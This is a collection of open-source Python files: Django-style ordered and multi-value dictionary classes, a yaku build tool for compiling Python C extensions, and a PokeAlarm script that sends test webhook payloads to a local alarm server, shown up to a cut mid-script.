def _iteritems(self):
for key in self.keyOrder:
yield key, self[key]
def _iterkeys(self):
for key in self.keyOrder:
yield key
def _itervalues(self):
for key in self.keyOrder:
yield self[key]
if six.PY3:
items = _iteritems
keys = _iterkeys
values = _itervalues
else:
iteritems = _iteritems
iterkeys = _iterkeys
itervalues = _itervalues
def items(self):
return [(k, self[k]) for k in self.keyOrder]
def keys(self):
return self.keyOrder[:]
def values(self):
return [self[k] for k in self.keyOrder]
def update(self, dict_):
for k, v in six.iteritems(dict_):
self[k] = v
def setdefault(self, key, default):
if key not in self:
self.keyOrder.append(key)
return super(SortedDict, self).setdefault(key, default)
def copy(self):
"""Returns a copy of this object."""
# This way of initializing the copy means it works for subclasses, too.
return self.__class__(self)
def __repr__(self):
"""
Replaces the normal dict.__repr__ with a version that returns the keys
in their sorted order.
"""
return '{%s}' % ', '.join('%r: %r' % (k, v) for k, v in six.iteritems(self))
def clear(self):
super(SortedDict, self).clear()
self.keyOrder = []
class OrderedSet(object):
"""
A set which keeps the ordering of the inserted items.
Currently backs onto OrderedDict.
"""
def __init__(self, iterable=None):
self.dict = OrderedDict(((x, None) for x in iterable) if iterable else [])
def add(self, item):
self.dict[item] = None
def remove(self, item):
del self.dict[item]
def discard(self, item):
try:
self.remove(item)
except KeyError:
pass
def __iter__(self):
return iter(self.dict.keys())
def __contains__(self, item):
return item in self.dict
def __bool__(self):
return bool(self.dict)
def __nonzero__(self): # Python 2 compatibility
return type(self).__bool__(self)
class MultiValueDictKeyError(KeyError):
pass
class MultiValueDict(dict):
"""
A subclass of dictionary customized to handle multiple values for the
same key.
>>> d = MultiValueDict({'name': ['Adrian', 'Simon'], 'position': ['Developer']})
>>> d['name']
'Simon'
>>> d.getlist('name')
['Adrian', 'Simon']
>>> d.getlist('doesnotexist')
[]
>>> d.getlist('doesnotexist', ['Adrian', 'Simon'])
['Adrian', 'Simon']
>>> d.get('lastname', 'nonexistent')
'nonexistent'
>>> d.setlist('lastname', ['Holovaty', 'Willison'])
This class exists to solve the irritating problem raised by cgi.parse_qs,
which returns a list for every key, even though most Web forms submit
single name-value pairs.
"""
def __init__(self, key_to_list_mapping=()):
super(MultiValueDict, self).__init__(key_to_list_mapping)
def __repr__(self):
return "<%s: %s>" % (self.__class__.__name__,
super(MultiValueDict, self).__repr__())
def __getitem__(self, key):
"""
Returns the last data value for this key, or [] if it's an empty list;
raises KeyError if not found.
"""
try:
list_ = super(MultiValueDict, self).__getitem__(key)
except KeyError:
raise MultiValueDictKeyError(repr(key))
try:
return list_[-1]
except IndexError:
return []
def __setitem__(self, key, value):
super(MultiValueDict, self).__setitem__(key, [value])
def __copy__(self):
return self.__class__([
(k, v[:])
for k, v in self.lists()
])
def __deepcopy__(self, memo=None):
if memo is None:
memo = {}
result = self.__class__()
memo[id(self)] = result
for key, value in dict.items(self):
dict.__setitem__(result, copy.deepcopy(key, memo),
copy.deepcopy(value, memo))
return result
def __getstate__(self):
obj_dict = self.__dict__.copy()
obj_dict['_data'] = dict((k, self.getlist(k)) for k in self)
return obj_dict
def __setstate__(self, obj_dict):
data = obj_dict.pop('_data', {})
for k, v in data.items():
self.setlist(k, v)
self.__dict__.update(obj_dict)
def get(self, key, default=None):
"""
Returns the last data value for the passed key. If key doesn't exist
or value is an empty list, then default is returned.
"""
try:
val = self[key]
except KeyError:
return default
if val == []:
return default
return val
def getlist(self, key, default=None):
"""
Returns the list of values for the passed key. If key doesn't exist,
then a default value is returned.
"""
try:
return super(MultiValueDict, self).__getitem__(key)
except KeyError:
if default is None:
return []
return default
def setlist(self, key, list_):
super(MultiValueDict, self).__setitem__(key, list_)
def setdefault(self, key, default=None):
if key not in self:
self[key] = default
# Do not return default here because __setitem__() may store
# another value -- QueryDict.__setitem__() does. Look it up.
return self[key]
def setlistdefault(self, key, default_list=None):
if key not in self:
if default_list is None:
default_list = []
self.setlist(key, default_list)
# Do not return default_list here because setlist() may store
# another value -- QueryDict.setlist() does. Look it up.
return self.getlist(key)
def appendlist(self, key, value):
"""Appends an item to the internal list associated with key."""
self.setlistdefault(key).append(value)
def _iteritems(self):
"""
Yields (key, value) pairs, where value is the last item in the list
associated with the key.
"""
for key in self:
yield key, self[key]
def _iterlists(self):
"""Yields (key, list) pairs."""
return six.iteritems(super(MultiValueDict, self))
def _itervalues(self):
"""Yield the last value on every key list."""
for key in self:
yield self[key]
if six.PY3:
items = _iteritems
lists = _iterlists
values = _itervalues
else:
iteritems = _iteritems
iterlists = _iterlists
itervalues = _itervalues
def items(self):
return list(self.iteritems())
def lists(self):
return list(self.iterlists())
def values(self):
return list(self.itervalues())
def copy(self):
"""Returns a shallow copy of this object."""
return copy.copy(self)
def update(self, *args, **kwargs):
"""
update() extends rather than replaces existing key lists.
Also accepts keyword args.
"""
if len(args) > 1:
raise TypeError("update expected at most 1 arguments, got %d" % len(args))
if args:
other_dict = args[0]
if isinstance(other_dict, MultiValueDict):
for key, value_list in other_dict.lists():
self.setlistdefault(key).extend(value_list)
else:
try:
for key, value in other_dict.items():
self.setlistdefault(key).append(value)
except TypeError:
raise ValueError("MultiValueDict.update() takes either a MultiValueDict or dictionary")
for key, value in six.iteritems(kwargs):
self.setlistdefault(key).append(value)
def dict(self):
"""
Returns current object as a dict with singular values.
"""
return dict((key, self[key]) for key in self)
class ImmutableList(tuple):
"""
A tuple-like object that raises useful errors when it is asked to mutate.
Example::
>>> a = ImmutableList(range(5), warning="You cannot mutate this.")
>>> a[3] = '4'
Traceback (most recent call last):
...
AttributeError: You cannot mutate this.
"""
def __new__(cls, *args, **kwargs):
if 'warning' in kwargs:
warning = kwargs['warning']
del kwargs['warning']
else:
warning = 'ImmutableList object is immutable.'
self = tuple.__new__(cls, *args, **kwargs)
self.warning = warning
return self
def complain(self, *wargs, **kwargs):
if isinstance(self.warning, Exception):
raise self.warning
else:
raise AttributeError(self.warning)
# All list mutation functions complain.
__delitem__ = complain
__delslice__ = complain
__iadd__ = complain
__imul__ = complain
__setitem__ = complain
__setslice__ = complain
append = complain
extend = complain
insert = complain
pop = complain
remove = complain
sort = complain
reverse = complain
class DictWrapper(dict):
"""
Wraps accesses to a dictionary so that certain values (those starting with
the specified prefix) are passed through a function before being returned.
The prefix is removed before looking up the real value.
Used by the SQL construction code to ensure that values are correctly
quoted before being used.
"""
def __init__(self, data, func, prefix):
super(DictWrapper, self).__init__(data)
self.func = func
self.prefix = prefix
def __getitem__(self, key):
"""
Retrieves the real value after stripping the prefix string (if
present). If the prefix is present, pass the value through self.func
before returning, otherwise return the raw value.
"""
if key.startswith(self.prefix):
use_func = True
key = key[len(self.prefix):]
else:
use_func = False
value = super(DictWrapper, self).__getitem__(key)
if use_func:
return self.func(value)
return value
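# Illustrative usage sketch (added by the editor; not part of the original module).
# DictWrapper applies ``func`` only to lookups whose key starts with ``prefix``;
# the quoting function and values below are arbitrary assumptions.
def _dict_wrapper_example():
    d = DictWrapper({'name': "O'Reilly"}, lambda v: v.replace("'", "''"), 'quoted_')
    return d['name'], d['quoted_name']  # ("O'Reilly", "O''Reilly")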
| bsd-3-clause | -4,628,845,063,320,184,000 | 28.274725 | 107 | 0.551802 | false |
abadger/Bento | bento/private/_yaku/yaku/tools/pyext.py | 1 | 16532 | import sys
import os
import copy
import distutils
import distutils.sysconfig
import re
import warnings
from subprocess \
import \
Popen, PIPE, STDOUT
from yaku.task_manager \
import \
topo_sort, build_dag, \
CompiledTaskGen, set_extension_hook
from yaku.sysconfig \
import \
get_configuration, detect_distutils_cc
from yaku.compiled_fun \
import \
compile_fun
from yaku.task \
import \
task_factory
from yaku.utils \
import \
ensure_dir, get_exception
from yaku.environment \
import \
Environment
from yaku.conftests \
import \
check_compiler, check_header
from yaku.tools.ctasks \
import \
apply_define
from yaku.scheduler \
import \
run_tasks
from yaku.conf \
import \
with_conf_blddir, create_file, write_log
from yaku.errors \
import \
TaskRunFailure
from yaku._config \
import \
_OUTPUT
import yaku.tools
pylink, pylink_vars = compile_fun("pylink", "${PYEXT_SHLINK} ${PYEXT_LINK_TGT_F}${TGT[0].abspath()} ${PYEXT_LINK_SRC_F}${SRC} ${PYEXT_APP_LIBDIR} ${PYEXT_APP_LIBS} ${PYEXT_APP_FRAMEWORKS} ${PYEXT_SHLINKFLAGS}", False)
pycc, pycc_vars = compile_fun("pycc", "${PYEXT_CC} ${PYEXT_CFLAGS} ${PYEXT_INCPATH} ${PYEXT_CC_TGT_F}${TGT[0].abspath()} ${PYEXT_CC_SRC_F}${SRC}", False)
pycxx, pycxx_vars = compile_fun("pycxx", "${PYEXT_CXX} ${PYEXT_CXXFLAGS} ${PYEXT_INCPATH} ${PYEXT_CXX_TGT_F}${TGT[0].abspath()} ${PYEXT_CXX_SRC_F}${SRC}", False)
pycxxlink, pycxxlink_vars = compile_fun("pycxxlink", "${PYEXT_CXXSHLINK} ${PYEXT_LINK_TGT_F}${TGT[0].abspath()} ${PYEXT_LINK_SRC_F}${SRC} ${PYEXT_APP_LIBDIR} ${PYEXT_APP_LIBS} ${PYEXT_APP_FRAMEWORKS} ${PYEXT_SHLINKFLAGS}", False)
# pyext env <-> sysconfig env conversion
_SYS_TO_PYENV = {
"PYEXT_SHCC": "CC",
"PYEXT_CCSHARED": "CCSHARED",
"PYEXT_SHLINK": "LDSHARED",
"PYEXT_SUFFIX": "SO",
"PYEXT_CFLAGS": "CFLAGS",
"PYEXT_OPT": "OPT",
"PYEXT_LIBDIR": "LIBDIR",
}
_PYENV_REQUIRED = [
"LIBDIR_FMT",
"LIBS",
"LIB_FMT",
"CPPPATH_FMT",
"CC_TGT_F",
"CC_SRC_F",
"LINK_TGT_F",
"LINK_SRC_F",
]
_SYS_TO_CCENV = {
"CC": "CC",
"SHCC": "CCSHARED",
"SHLINK": "LDSHARED",
"SO": "SO",
"CFLAGS": "CFLAGS",
"OPT": "OPT",
"LIBDIR": "LIBDIR",
"LIBDIR_FMT": "LIBDIR_FMT",
"LIBS": "LIBS",
"LIB_FMT": "LIB_FMT",
"CPPPATH_FMT": "CPPPATH_FMT",
"CC_TGT_F": "CC_TGT_F",
"CC_SRC_F": "CC_SRC_F",
"CXX": "CXX",
"CXXSHLINK": "CXXSHLINK",
}
def setup_pyext_env(ctx, cc_type="default", use_distutils=True):
pyenv = Environment()
if use_distutils:
if cc_type == "default":
dist_env = get_configuration()
else:
dist_env = get_configuration(cc_type)
for name, value in dist_env.items():
pyenv["PYEXT_%s" % name] = value
pyenv["PYEXT_FMT"] = "%%s%s" % dist_env["SO"]
pyenv["PYEXT_SHLINKFLAGS"] = dist_env["LDFLAGS"]
else:
old_env = ctx.env
ctx.env = Environment()
cc_env = None
sys.path.insert(0, os.path.dirname(yaku.tools.__file__))
try:
try:
mod = __import__(cc_type)
mod.setup(ctx)
except ImportError:
raise RuntimeError("No tool %s is available (import failed)" \
% cc_type)
cc_env = ctx.env
finally:
sys.path.pop(0)
ctx.env = old_env
pyenv["PYEXT_CC"] = cc_env["CC"]
pyenv["PYEXT_CFLAGS"] = cc_env["CFLAGS"]
pyenv["PYEXT_LIBDIR"] = cc_env["LIBDIR"]
pyenv["PYEXT_LIBS"] = cc_env["LIBS"]
pyenv["PYEXT_FMT"] = "%s.so"
pyenv["PYEXT_SHLINK"] = cc_env["MODLINK"]
pyenv["PYEXT_SHLINKFLAGS"] = cc_env["MODLINKFLAGS"]
pyenv["PYEXT_CPPPATH"] = cc_env["CPPPATH"]
pyenv.append("PYEXT_CPPPATH", distutils.sysconfig.get_python_inc(), create=True)
if sys.platform == "win32":
pyenv.append("PYEXT_LIBDIR", os.path.join(sys.exec_prefix, "libs"))
return pyenv
def pycc_hook(self, node):
tasks = pycc_task(self, node)
self.object_tasks.extend(tasks)
return tasks
def pycc_task(self, node):
base = self.env["CC_OBJECT_FMT"] % node.name
target = node.parent.declare(base)
ensure_dir(target.abspath())
task = task_factory("pycc")(inputs=[node], outputs=[target])
task.gen = self
task.env_vars = pycc_vars
task.env = self.env
task.func = pycc
return [task]
def pycxx_hook(self, node):
tasks = pycxx_task(self, node)
self.object_tasks.extend(tasks)
self.has_cxx = True
return tasks
def pycxx_task(self, node):
base = self.env["CXX_OBJECT_FMT"] % node.name
target = node.parent.declare(base)
ensure_dir(target.abspath())
task = task_factory("pycxx")(inputs=[node], outputs=[target])
task.gen = self
task.env_vars = pycxx_vars
task.env = self.env
task.func = pycxx
return [task]
def pylink_task(self, name):
objects = [tsk.outputs[0] for tsk in self.object_tasks]
if len(objects) < 1:
warnings.warn("task %s has no inputs !" % name)
def declare_target():
folder, base = os.path.split(name)
tmp = folder + os.path.sep + self.env["PYEXT_FMT"] % base
return self.bld.path.declare(tmp)
target = declare_target()
ensure_dir(target.abspath())
task = task_factory("pylink")(inputs=objects, outputs=[target])
task.gen = self
task.func = pylink
task.env_vars = pylink_vars
self.link_task = task
return [task]
# XXX: fix merge env location+api
class PythonBuilder(yaku.tools.Builder):
    def clone(self):
        return PythonBuilder(self.ctx)

    def __init__(self, ctx):
        yaku.tools.Builder.__init__(self, ctx)

    def _compile(self, task_gen, name):
        apply_define(task_gen)
        apply_cpppath(task_gen)
        tasks = task_gen.process()
        for t in tasks:
            t.env = task_gen.env
        return tasks

    def try_compile(self, name, body, headers=None):
        old_hook = set_extension_hook(".c", pycc_task)
        try:
            return with_conf_blddir(self.ctx, name, body,
                    lambda : yaku.tools.try_task_maker(self.ctx, self._compile, name, body, headers))
        finally:
            set_extension_hook(".c", old_hook)

    def try_extension(self, name, body, headers=None):
        old_hook = set_extension_hook(".c", pycc_task)
        try:
            return with_conf_blddir(self.ctx, name, body,
                    lambda : yaku.tools.try_task_maker(self.ctx, self._extension, name, body, headers))
        finally:
            set_extension_hook(".c", old_hook)
    def _extension(self, task_gen, name):
        bld = self.ctx
        base = name.replace(".", os.sep)
        tasks = []

        old_hook = set_extension_hook(".c", pycc_hook)
        old_hook_cxx = set_extension_hook(".cxx", pycxx_hook)

        apply_define(task_gen)
        apply_cpppath(task_gen)
        apply_libpath(task_gen)
        apply_libs(task_gen)
        apply_frameworks(task_gen)

        tasks = task_gen.process()
        ltask = pylink_task(task_gen, base)
        task_gen.link_task = ltask
        if task_gen.has_cxx:
            task_gen.link_task[-1].func = pycxxlink
            task_gen.link_task[-1].env_vars = pycxxlink_vars
        tasks.extend(ltask)
        for t in tasks:
            t.env = task_gen.env
        set_extension_hook(".c", old_hook)
        set_extension_hook(".cxx", old_hook_cxx)
        return tasks
    def extension(self, name, sources, env=None):
        sources = self.to_nodes(sources)
        task_gen = CompiledTaskGen("pyext", self.ctx, sources, name)
        task_gen.bld = self.ctx
        task_gen.env = yaku.tools._merge_env(self.env, env)
        tasks = self._extension(task_gen, name)
        self.ctx.tasks.extend(tasks)

        outputs = []
        for t in task_gen.link_task:
            outputs.extend(t.outputs)
        task_gen.outputs = outputs
        return tasks
    def configure(self, candidates=None, use_distutils=True):
        ctx = self.ctx

        # How we do it
        # 1: for distutils-based configuration
        #     - get compile/flags flags from sysconfig
        #     - detect yaku tool name from CC used by distutils:
        #         - get the compiler executable used by distutils ($CC
        #           variable)
        #         - try to determine yaku tool name from $CC
        #     - apply necessary variables from yaku tool to $PYEXT_
        #       "namespace"
        if candidates is None:
            compiler_type = "default"
        else:
            compiler_type = candidates[0]

        if use_distutils:
            dist_env = setup_pyext_env(ctx, compiler_type)
            ctx.env.update(dist_env)

            cc_exec = get_distutils_cc_exec(ctx, compiler_type)
            yaku_cc_type = detect_cc_type(ctx, cc_exec)
            if yaku_cc_type is None:
                raise ValueError("No adequate C compiler found (distutils mode)")
            _setup_compiler(ctx, yaku_cc_type)

            cxx_exec = get_distutils_cxx_exec(ctx, compiler_type)
            yaku_cxx_type = detect_cxx_type(ctx, cxx_exec)
            if yaku_cxx_type is None:
                raise ValueError("No adequate CXX compiler found (distutils mode)")
            _setup_cxxcompiler(ctx, yaku_cxx_type)
        else:
            dist_env = setup_pyext_env(ctx, compiler_type, False)
            ctx.env.update(dist_env)
            _setup_compiler(ctx, compiler_type)

        pycode = r"""\
#include <Python.h>
#include <stdio.h>
static PyObject*
hello(PyObject *self, PyObject *args)
{
    printf("Hello from C\n");
    Py_INCREF(Py_None);
    return Py_None;
}
static PyMethodDef HelloMethods[] = {
    {"hello", hello, METH_VARARGS, "Print a hello world."},
    {NULL, NULL, 0, NULL} /* Sentinel */
};
PyMODINIT_FUNC
init_bar(void)
{
    (void) Py_InitModule("_bar", HelloMethods);
}
"""
ctx.start_message("Checking whether %s can build python object code" % compiler_type)
try:
self.try_compile("foo", pycode)
ctx.end_message("yes")
except TaskRunFailure:
e = get_exception()
ctx.end_message("no")
ctx.fail_configuration(str(e))
ctx.start_message("Checking whether %s can build python extension" % compiler_type)
try:
self.try_extension("foo", pycode)
ctx.end_message("yes")
except TaskRunFailure:
e = get_exception()
ctx.end_message("no")
ctx.fail_configuration(str(e))
self.configured = True
def get_builder(ctx):
    return PythonBuilder(ctx)

CC_SIGNATURE = {
    "gcc": re.compile("gcc version"),
    "msvc": re.compile(r"Microsoft \(R\) (32-bit |)C/C\+\+ Optimizing Compiler")
}
def detect_cc_type(ctx, cc_cmd):
    return _detect_cc_type(ctx, cc_cmd)

def detect_cxx_type(ctx, cxx_cmd):
    cxx_type = _detect_cc_type(ctx, cxx_cmd)
    if cxx_type == "gcc":
        return "gxx"
    else:
        return cxx_type
def _detect_cc_type(ctx, cc_cmd):
    cc_type = None

    def detect_type(vflag):
        cmd = cc_cmd + [vflag]
        try:
            p = Popen(cmd, stdout=PIPE, stderr=STDOUT)
            out = p.communicate()[0].decode()
            for k, v in CC_SIGNATURE.items():
                m = v.search(out)
                if m:
                    return k
        except OSError:
            pass
        return None

    _OUTPUT.write("Detecting CC type... ")
    if sys.platform == "win32":
        for v in ["", "-v"]:
            cc_type = detect_type(v)
            if cc_type:
                break
    else:
        for v in ["-v", "-V", "-###"]:
            cc_type = detect_type(v)
            if cc_type:
                break
    if cc_type is None:
        cc_type = "cc"
    _OUTPUT.write("%s\n" % cc_type)
    return cc_type
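# Detection example (typical output, may differ per toolchain): "gcc -v"
# ends with a line such as "gcc version 4.8.4 (Ubuntu ...)", which matches
# the "gcc version" signature above, so _detect_cc_type() returns "gcc";
# when nothing matches, the generic "cc" fallback is returned.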
def get_distutils_cc_exec(ctx, compiler_type="default"):
from distutils import ccompiler
_OUTPUT.write("Detecting distutils CC exec ... ")
if compiler_type == "default":
compiler_type = \
distutils.ccompiler.get_default_compiler()
compiler = ccompiler.new_compiler(compiler=compiler_type)
if compiler_type == "msvc":
compiler.initialize()
cc = [compiler.cc]
else:
cc = compiler.compiler_so
_OUTPUT.write("%s\n" % " ".join(cc))
return cc
def get_distutils_cxx_exec(ctx, compiler_type="default"):
from distutils import ccompiler
from distutils.sysconfig import customize_compiler
_OUTPUT.write("Detecting distutils CXX exec ... ")
if compiler_type == "default":
compiler_type = \
distutils.ccompiler.get_default_compiler()
compiler = ccompiler.new_compiler(compiler=compiler_type)
if compiler_type == "msvc":
compiler.initialize()
cc = [compiler.cc]
else:
customize_compiler(compiler)
cc = compiler.compiler_cxx
_OUTPUT.write("%s\n" % " ".join(cc))
return cc
def _setup_compiler(ctx, cc_type):
    old_env = ctx.env
    ctx.env = Environment()
    cc_env = None
    sys.path.insert(0, os.path.dirname(yaku.tools.__file__))
    try:
        try:
            mod = __import__(cc_type)
            mod.setup(ctx)
        except ImportError:
            raise RuntimeError("No tool %s is available (import failed)" \
                    % cc_type)
        # XXX: this is ugly - find a way to have tool-specific env...
        cc_env = ctx.env
    finally:
        sys.path.pop(0)
        ctx.env = old_env

    copied_values = ["CPPPATH_FMT", "LIBDIR_FMT", "LIB_FMT",
                     "CC_OBJECT_FMT", "CC_TGT_F", "CC_SRC_F", "LINK_TGT_F",
                     "LINK_SRC_F"]
    for k in copied_values:
        ctx.env["PYEXT_%s" % k] = cc_env[k]
    ctx.env.prextend("PYEXT_CPPPATH", cc_env["CPPPATH"])
    ctx.env.prextend("PYEXT_LIBDIR", cc_env["LIBDIR"])
def _setup_cxxcompiler(ctx, cxx_type):
    old_env = ctx.env
    ctx.env = Environment()
    sys.path.insert(0, os.path.dirname(yaku.tools.__file__))
    try:
        mod = __import__(cxx_type)
        mod.setup(ctx)
        cxx_env = ctx.env
    finally:
        sys.path.pop(0)
        ctx.env = old_env

    for k in ["CXX", "CXXFLAGS", "CXX_TGT_F", "CXX_SRC_F",
              "CXXSHLINK"]:
        ctx.env["PYEXT_%s" % k] = cxx_env[k]
# FIXME: find a way to reuse this kind of code between tools
def apply_frameworks(task_gen):
    # XXX: do this correctly (platform specific tool config)
    if sys.platform == "darwin":
        frameworks = task_gen.env.get("PYEXT_FRAMEWORKS", [])
        task_gen.env["PYEXT_APP_FRAMEWORKS"] = []
        for framework in frameworks:
            task_gen.env["PYEXT_APP_FRAMEWORKS"].extend(["-framework", framework])
    else:
        task_gen.env["PYEXT_APP_FRAMEWORKS"] = []
def apply_libs(task_gen):
    libs = task_gen.env["PYEXT_LIBS"]
    task_gen.env["PYEXT_APP_LIBS"] = [
        task_gen.env["PYEXT_LIB_FMT"] % lib for lib in libs]

def apply_libpath(task_gen):
    libdir = task_gen.env["PYEXT_LIBDIR"]
    #implicit_paths = set([
    #    os.path.join(task_gen.env["BLDDIR"], os.path.dirname(s))
    #    for s in task_gen.sources])
    implicit_paths = []
    libdir = list(implicit_paths) + libdir
    task_gen.env["PYEXT_APP_LIBDIR"] = [
        task_gen.env["PYEXT_LIBDIR_FMT"] % d for d in libdir]
def apply_cpppath(task_gen):
    cpppaths = task_gen.env["PYEXT_CPPPATH"]
    implicit_paths = set([s.parent.srcpath() \
            for s in task_gen.sources])
    srcnode = task_gen.sources[0].ctx.srcnode

    relcpppaths = []
    for p in cpppaths:
        if not os.path.isabs(p):
            node = srcnode.find_node(p)
            assert node is not None, "could not find %s" % p
            relcpppaths.append(node.bldpath())
        else:
            relcpppaths.append(p)
    cpppaths = list(implicit_paths) + relcpppaths
    task_gen.env["PYEXT_INCPATH"] = [
        task_gen.env["PYEXT_CPPPATH_FMT"] % p
        for p in cpppaths]
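# Worked example (paths are illustrative): with PYEXT_CPPPATH_FMT = "-I%s",
# a final cpppaths list such as ["src", "/usr/include/python2.7"] becomes
# PYEXT_INCPATH = ["-Isrc", "-I/usr/include/python2.7"], i.e. the include
# flags passed on the compile command line.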
| bsd-3-clause | -3,239,157,631,129,578,000 | 30.310606 | 229 | 0.570893 | false |
neskk/PokeAlarm | tools/webhook_test.py | 1 | 12389 | import requests
import time
import sys
import json
import re
import os
import portalocker
import pickle
truthy = frozenset([
    "yes", "Yes", "y", "Y", "true", "True", "TRUE", "YES", "1", "!0"
])

whtypes = {
    "1": "pokemon",
    "2": "pokestop",
    "3": "gym",
    "4": "egg",
    "5": "raid"
}

teams = {
    "0": "Uncontested",
    "1": "Mystic",
    "2": "Valor",
    "3": "Instinct"
}
teams_formatted = re.sub('[{}",]', '', json.dumps(
    teams, indent=4, sort_keys=True))

_cache = {}
_gym_info = {}

def get_image_url(image):
    return \
        "https://raw.githubusercontent.com/not4profit/images/master/" + image

_default_gym_info = {
    "name": "unknown",
    "description": "unknown",
    "url": get_image_url('icons/gym_0.png')
}
def set_init(webhook_type):
    """Return a template webhook payload for the requested webhook type."""
    payloadr = {}
    current_time = time.time()
    if webhook_type == whtypes["1"]:
        payloadr = {
            "type": "pokemon",
            "message": {
                "pokemon_id": 149,
                "pokemon_level": 30,
                "player_level": 30,
                "latitude": 37.7876146,
                "longitude": -122.390624,
                "encounter_id": current_time,
                "cp_multiplier": 0.7317000031471252,
                "form": None,
                "cp": 768,
                "individual_attack": 10,
                "individual_defense": 1,
                "individual_stamina": 9,
                "move_1": 281,
                "move_2": 133,
                "height": 0.5694651007652283,
                "weight": 5.733094215393066,
                "gender": 3,
                "seconds_until_despawn": 1754,
                "spawn_start": 2153,
                "spawn_end": 3264,
                "verified": False
            }
        }
    elif webhook_type == whtypes["2"]:
        payloadr = {
            "type": "pokestop",
            "message": {
                "pokestop_id": current_time,
                "enabled": "True",
                "latitude": 37.7876146,
                "longitude": -122.390624,
                "active_fort_modifier": 0
            }
        }
    elif webhook_type == whtypes["3"]:
        payloadr = {
            "type": "gym",
            "message": {
                "raid_active_until": 0,
                "gym_id": 0,
                "gym_name": "unknown",
                "team_id": 3,
                "slots_available": 0,
                "guard_pokemon_id": 99,
                "lowest_pokemon_motivation": 0.8795773983001709,
                "total_cp": 11099,
                "enabled": "True",
                "latitude": 37.7876146,
                "longitude": -122.390624
            }
        }
    elif webhook_type == whtypes["4"]:
        payloadr = {
            "type": "raid",
            "message": {
                "gym_id": 0,
                "gym_name": "unknown",
                "level": 5,
                "latitude": 37.7876146,
                "longitude": -122.390624
            }
        }
    elif webhook_type == whtypes["5"]:
        payloadr = {
            "type": "raid",
            "message": {
                "gym_id": 0,
                "gym_name": "unknown",
                "pokemon_id": 150,
                "cp": 12345,
                "move_1": 123,
                "move_2": 123,
                "level": 5,
                "latitude": 37.7876146,
                "longitude": -122.390624
            }
        }
    return payloadr
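# Minimal non-interactive sketch of how these templates are used (the
# interactive flow below does the same thing with user input):
#   payload = set_init(whtypes["1"])          # Dragonite spawn template
#   payload["message"]["pokemon_id"] = 249    # swap in another species
#   requests.post("http://127.0.0.1:4000", json=payload)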
def check_int(questionable_input, default):
    if questionable_input.isdigit():
        return int(questionable_input.lstrip("-"))
    else:
        print "Not a valid number. Defaulting to " + str(default)
        return default

def int_or_default(input_parm):
    payload["message"][input_parm] = check_int(
        raw_input(), payload["message"][input_parm])
def get_gym_info(gym_id):
    """ Gets the information about the gym. """
    return _gym_info.get(gym_id, _default_gym_info)

def gym_or_invalid(prm, prm2):
    questionable_input = raw_input()
    while get_gym_info(questionable_input)['name'] == "unknown":
        print "Not a valid gym. Please try again..\n>",
        questionable_input = raw_input()
    print "Gym found! {}".format(get_gym_info(questionable_input)['name'])
    payload["message"][prm] = questionable_input
    payload["message"][prm2] = get_gym_info(questionable_input)['name']
def cache_or_invalid():
    path = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
    input = raw_input()
    if os.path.exists(os.path.join(path, "cache", "{}.cache".format(input))):
        file = os.path.join(path, "cache", "{}.cache".format(input))
        print "Valid file = {}".format(file)
    elif os.path.exists(os.path.join(path, "cache", "manager_0.cache")):
        file = os.path.join(path, "cache", "manager_0.cache")
        print "Invalid file using default = {}".format(file)
    else:
        print "No valid cache file found, terminating.."
        sys.exit(1)
    load_cache(file)

def load_cache(file):
    global _gym_info
    with portalocker.Lock(file, mode="rb") as f:
        data = pickle.load(f)
        _gym_info = data.get('gym_info', {})
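# Assumed cache layout (inferred from the lookups in this script): the
# pickled file holds a dict such as
#   {'gym_info': {<gym_id>: {'name': ..., 'description': ..., 'url': ...}}}
# and unknown gym ids fall back to _default_gym_info via get_gym_info().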
def list_cache():
    path = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
    print "Here is a list of cache files found in \cache\ :"
    for file in os.listdir(os.path.join(path, "cache")):
        if file.endswith(".cache"):
            print file
def list_gyms():
    path = os.path.dirname(os.path.abspath(__file__))
    if len(_gym_info) > 50:
        with portalocker.Lock(os.path.join(path, "gyms.txt"), mode="wb+") as f:
            i = 0
            for key in _gym_info.keys():
                i += 1
                name = get_gym_info(key)['name']
                f.write("[{}] {} : {} \n".format(i, name, key))
            f.close()
        print "Find list of gyms in your \\tools\ folder (gyms.txt)"
        print "Enter gym id for raid (from file)\n>",
    else:
        print "Here is a list of gyms found in your cache:"
        i = 0
        for key in _gym_info.keys():
            i += 1
            name = get_gym_info(key)['name']
            print "[{}] {} : {} ".format(i, name, key)
        print "Enter gym id for raid (from above)\n>",
def gym_cache():
    print "Do you use file caching or does 'gym name' matter? (Y/N)\n>",
    if raw_input() in truthy:
        list_cache()
        print "Enter cache file name to verify the gym (default:manager_0)\n>",
        cache_or_invalid()
        list_gyms()
        gym_or_invalid("gym_id", "gym_name")
def reset_timers_and_encounters():
    current_time = time.time()
    if payload["type"] == "pokemon":
        payload["message"].update({
            "disappear_time": current_time + 10,
            "last_modified_time": current_time,
            "time_until_hidden_ms": 10000,
            "encounter_id": current_time
        })
    elif payload["type"] == "pokestop":
        payload["message"].update({
            "last_modified_time": current_time,
            "lure_expiration": current_time + 60,
        })
    elif payload["type"] == "gym":
        payload["message"].update({
            "last_modified": current_time,
            "occupied_since": current_time - 9000
        })
    elif payload["type"] == "raid":
        payload["message"].update({
            "start": current_time + 20,
            "end": current_time + 20 + 60,
        })
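# Timing example for the raid branch above: if the payload is (re)sent at
# time t, then "start" = t + 20 and "end" = t + 80, so the fake raid starts
# 20 seconds from now and lasts 60 seconds, long enough for an alarm to
# fire during the test.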
def get_and_validate_team():
    team = teams.get(raw_input(), 5)
    if team == 5:
        print "Team invalid, defaulting to Uncontested"
        team = 0
    else:
        for team_id, team_name in teams.iteritems():
            if team_name == team:
                team = int(team_id)
    payload["message"]["team_id"] = team
webhooks_formatted = re.sub('[{}",]', '', json.dumps(
    whtypes, indent=4, sort_keys=True))

print "What kind of webhook would you like to send?(put in a number)\n"\
    + webhooks_formatted + ">",
type = whtypes.get(raw_input(), 0)
if type == 0:
    print "Must put in valid webhook type"
    sys.exit(1)
payload = set_init(type)

print "What is the URL of where you would like to send the webhook? " \
    + "(default: http://127.0.0.1:4000)\n>",
url = raw_input()
if url == '' or url.isspace():
    url = "http://127.0.0.1:4000"
    print "Assuming " + url + " as webhook URL"
print "Does location matter or do you use geofences? (Y/N)\n>",
if raw_input() in truthy:
regex_coordinates = re.compile("[-+]?[0-9]*\.?[0-9]*"
+ "[ \t]*,[ \t]*" + "[-+]?[0-9]*\.?[0-9]*")
print "Enter latitude,longitude (Ex. 37.7876146,-122.390624)\n>",
coordinates = raw_input()
